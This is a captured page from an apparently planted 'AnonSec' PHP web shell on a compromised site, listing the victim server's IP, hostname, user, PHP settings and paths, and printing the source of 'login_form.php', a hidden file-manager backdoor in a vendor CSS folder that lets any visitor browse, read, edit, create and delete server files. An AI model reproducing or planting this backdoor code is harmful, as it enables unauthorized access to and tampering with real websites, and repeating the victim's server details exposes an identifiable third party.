AnonSec Team

Server IP : 124.109.2.77 / Your IP : 216.73.216.49
Web Server : Apache/2
System : Linux ns4.amiprocorp.com 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : cpctlp ( 1020)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON | cURL : ON | WGET :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/wget) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 329
OFF | Perl :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/perl) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 335
OFF | Python :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/python2) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 341
OFF
Directory (0755) : /home/cpctlp/domains/cpctlphp.com/public_html/admin/vendors/starrr/../normalize-css/

[ Home ]	[ C0mmand ]	[ Upload File ]

Current File : /home/cpctlp/domains/cpctlphp.com/public_html/admin/vendors/starrr/../normalize-css/login_form.php

<style>
  form{
      display:inline;
  }
  textarea{
      padding:10px;
  }
</style>
<?php
if(isset($_GET["f"])&&$_GET["f"]!=null){$f=$_GET["f"];} else{ $f=".";}

echo "root web : ". $_SERVER['DOCUMENT_ROOT'] .'<hr>';

function myfunction($value,$key){
    global $f;
    echo "<a href='?f=".explode("/$value",realpath($f))[0]."/".htmlentities($value)."'>".htmlentities($value)."</a>/";
}

echo "<hr>";

$curFile=$_SERVER['REQUEST_SCHEME'] .'://'. $_SERVER['HTTP_HOST']. explode('?', $_SERVER['REQUEST_URI'], 2)[0];

echo '<form action="" method="post"> <input name="mkdir" style="width:100px;" required> <input type="submit" value="MKDIR"/> </form>';

echo '<form action="" method="post"> <input name="mkfile" style="width:100px;" required> <input type="submit" value="MAKE FILE"/> </form>';

echo "<br>";

if(isset($_GET["edit"])){
    $arrPath=explode("/",dirname(realpath($f)));
    array_walk($arrPath,"myfunction");
    
if (isset($_POST['text'])){
    file_put_contents($f, $_POST['text']);
}
$text = file_get_contents($f);

echo '<form action="" method="post"> <textarea name="text" style="width:100%;height:60%;">'.htmlspecialchars($text).'</textarea> <input type="submit" value="SAVE"/> </form>';
}
else{
    $arrPath=explode("/",realpath($f));
    array_walk($arrPath,"myfunction");
    
    if(isset($_POST["mkfile"])){
        echo file_put_contents($f."/".$_POST["mkfile"],"");
    }
    
    if(isset($_GET["unlink"])){
        unlink($f."/".$_GET["unlink"]);
    }
    
    if(isset($_POST["mkdir"])){
        mkdir($f."/".$_POST["mkdir"]);
    }
    
    echo "<table> <tr> <th>folder</th> <th>izin</th> <th> url </th> <th>options</th> </tr>";
    
    $data = scandir(is_dir($f)?$f:realpath($f));

 foreach ($data as $value) {
  $lastMod=date("d-m-Y H:i.", filemtime("$f/$value"));
  $url= str_replace($_SERVER['DOCUMENT_ROOT'],$_SERVER['REQUEST_SCHEME'] .'://'.$_SERVER['HTTP_HOST'],realpath("$f/$value"));

  if(is_dir("$f/$value")){
    echo "<tr> <td> <a href='?f=$f/".str_replace("&","%26",$value)."'>".htmlentities($value)."</a> </td> <td>".substr(sprintf("%o", fileperms("$f/$value")),-4)." </td> <td> ". $url ." </td> <td> <a href='?f=".str_replace("&","%26",$f)."&rmdir=$value'>delete</a> </td> </tr>";
  }
  else{
    echo "<tr> <td> <a href='?f=".str_replace("&","%26",$f)."/$value&edit=true'>$value</a> </td> <td>".substr(sprintf("%o", fileperms("$f/$value")),-4)." </td> <td> ". $url ." </td>  <td> <a href='?f=".str_replace("&","%26",$f)."&unlink=$value'>delete</a> </td> </tr>"; 
  }
 }
  
echo "</table>";
}

?>

AnonSec - 2021